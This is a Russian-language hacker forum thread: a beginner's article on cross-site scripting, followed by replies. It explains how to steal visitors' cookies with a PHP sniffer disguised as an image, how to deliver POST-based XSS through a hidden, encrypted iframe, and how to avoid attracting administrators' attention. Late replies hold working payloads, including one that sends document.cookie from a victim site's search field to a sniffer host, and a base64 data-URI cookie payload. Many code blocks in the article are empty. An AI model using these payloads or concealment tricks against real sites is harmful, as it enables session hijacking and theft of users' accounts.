![]() |
XSS. Межсайтовый скриптинг
Моя первая статья, Автор: mr.Penguin Вступление XSS - тип уязвимости, позволяющий вставить произвольный JavaScript код в тело страницы сайта. XSS расшифровывается как Cross Site Scripting. Для термина используют сокращение "XSS", чтобы не было путаницы с "CSS" (каскадные таблицы стилей - приминяются в оформлении страницы сайта). Для чего служит? XSS служит для атаки пользователей, просматривающих зараженную страницу. Чаще всего, данную уязвимость используют для кражи cookies (применяется для сохранения данных на стороне юзера) у пользователя. Виды XSS Уязвимостей Типы уязвимостей делятся на два вида. #1 Активная XSS. Данный тип уязвимости хранится на сервере, и срабатывает в браузере жертвы при открытии какой-либо страницы зараженного сайта. Чаще всего, активную XSS можно встретить в чатах/блогах/новостных лентах/комментариях. #2 Пассивная XSS. Пассивная XSS-атака получается при конкретном запросе к скрипту. Параметры передаются через GET и POST запросы. В отличие от POST запроса, с GET`ом намного проще. На мой взгяд, пассивные xss - самые неудобные уязвимости для осуществления атаки на сайте. XSS на примере Чтобы найти пассивную XSS на сайте, достаточно подставить в форму ввода следующий код: Код:
Code:Код:
Code:Рассмотрим на примере работу пассивной XSS. Давайте зайдем на какой-нибудь сайт и найдем там поиск. Параметры передаются через GET запрос. В форму ввода пишем Код:
Code:Код:
Code:Вот готовый пример пассивной XSS на Online-переводчике - Код:
Code:Для того, чтобы украсть cookies пользователя, нам понадобиться онлайн-сниффер. Его можно найти в интернете, но можно использовать и свой. Нам понадобиться два файла: 1) file.php - В нем и будет находится наш снифер PHP код:
Можно поменять расширение "php" на "gif", чтобы наш скрипт не вызывал никаких подозрений. Тут нам поможет ".htaccess", в котором мы пропишем следующее: Код:
Code:Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем. Спасибо за внимание. P.S. Не забывайте про фильтрацию HTML-тегов. Различные способы вставки JavaScript кода вы можете посмотреть здесь. P.S2 Статья будет дополняться. Вторая часть статьи: Проводим XSS через POST |
Таких статей море, ничего нового =(
|
Цитата:
Я владею достаточной информацией про данный тип уязвимости, но решил написать всего лишь представление об этой уязвимости. Именно поэтому в конце написал "Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем.", а это значит - постараюсь ответить на вопрос пользователя и может быть, Вы или кто-то другой узнает что-то новое. |
Регистрация: 08.03.2012
Человек, который зарегистрировался только, чтобы написать статью, поделится знаниями! Браво =) |
Цитата:
|
а че ни слова не написал про обход фильрации при проведении атаки? проблема весьма актуальная. Выложил бы софт по проведению данной атаки для упрощения и автоматиизации процесса. Доведи до ума Статью если хочешь похвалы!
|
Цитата:
|
Цитата:
Цитата:
|
Основные замечания по статье:
XSS делятся не на два типа, а на три: 1) Активные (хранимые) 2) Пассивные (отраженные) 3) DOM-based Указанные векторы атак не подходят для надежной проверки на XSS-уязвимость. Желательно проверять вручную на фильтрацию определенных символов (в зависимости от места вывода), чтобы не вызвать подозрения у администрации сайта. В крайнем случае, можно использовать универсальные векторы XSS (где их найти, спросите у гугла) Кража сессии - не единственная возможность XSS (чтение данных со страниц сайта, выполнение запросов, доступ к локальному хранилищу, базам данных) Не написано о практической эксплуатации пассивных XSS (прямой переход по ссылке, шифрование, сокращение, скрытые фреймы) Это неправильно: PHP код:
Никаких действий с объектом img в дальнейшем не производится, поэтому можно сократить код так: PHP код:
PHP код:
|
M_script, согласен. Но я решил написать о двух основных типах XSS.
Код:
Code:В следующий раз постараюсь написать всё внятней. |
Пингвин, ты не вторую часть пиши, а первую дополни, тогда что-то будет, а не очередное говно
|
Раз пишешь для новичков, описал бы уже применение post пасивок. Меня, в своё время, это интересовало больше всего.
|
Цитата:
|
По просьбе mr.The, сейчас я попробую рассказать вам про проведение пассивной XSS через POST запрос.
Я не буду писать подробную статью, а лишь покажу азы проведения XSS через POST. Так что же нам понадобится, чтобы провести XSS через POST? Нам нужна обычная HTML страница, в которой будет содержаться скрипт автоматической отправки формы. Давайте создадим страницу и назовем ее xss.html Я предоставлю Вам четыре варианта отправки пассивной POST XSS. Вариант #1 Код:
Code:Код:
Code:Код:
Code:Код:
Code:Для этого нам понадобится невидимый iframe, давайте создадим страницу iframe.html и запишем в него следующий код: Код:
Code:Можно также зашифровать наш фрейм. Для этого существуют различные сервисы шифровки HTML кода (Крипт сервисы). Они делятся на два типа: бесплатные и платные. Бесплатный можно найти, погуглив в интернете (кл. слово зашифровать html код), но я советую Вам воспользоваться платным криптом. Они надежнее. Спасибо за внимание |
и так, раз для новичков, пожалуй начнем =)
сначала хочу сказать спасибо, за старание/статью теперь ближе к делу Цитата:
и с чего начиналась твоя деятельность по сей направлению ? книги, мануалы, статьи и т.п что бы уметь находить подобные уязвимости в сайтах, нужно шарить в сайто-строении ? или не обязательно ? |
Цитата:
Ну а если нет, то объясню. Что под формой ввода я подразумеваю ввод пароля и логина для авторизации на сайте или же для поиска необходимой информации. Познавал данный тип уязвимостей я сам, но конечно же читал и статьи, без них - ничего нормального не узнаешь. Что бы уметь находить подобные уязвимости в сайтах, необходимо "шарить" в сайтостроении, хотя-бы на базовом уровне. |
|
Цитата:
|
а где написанно про самодостаточную xss?? про такой тип data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+ а ведь еще недавно она прокатывала на майле в теле письма
|
Цитата:
|
мне кажется что у него уже времени на это много...
|
Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?
|
второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/
Код HTML:
HTML:Код HTML:
HTML:...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте |
xss
Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?.. Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать |
Вот простой для вас вопрос я думаю...
site/search/?q=" onmouseover=prompt(3333) />document.write(document.cookie);bad= [/HTML] |
нашёл решение для снифера, работает исключительно так:
[HTML] HTML: www.victim.ru/search/?q=" onmouseover=/>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookiebad=(( может кто-нибудь подскажет ,другие варианты? |
| Время: 20:31 |